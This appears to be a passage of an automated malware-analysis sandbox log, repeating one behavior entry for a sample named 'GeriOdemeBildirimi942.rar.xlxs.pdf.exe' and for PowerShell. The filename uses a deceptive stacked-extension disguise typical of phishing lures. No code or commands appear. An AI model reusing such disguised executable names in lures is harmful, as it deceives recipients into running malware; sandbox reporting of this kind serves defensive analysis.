                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
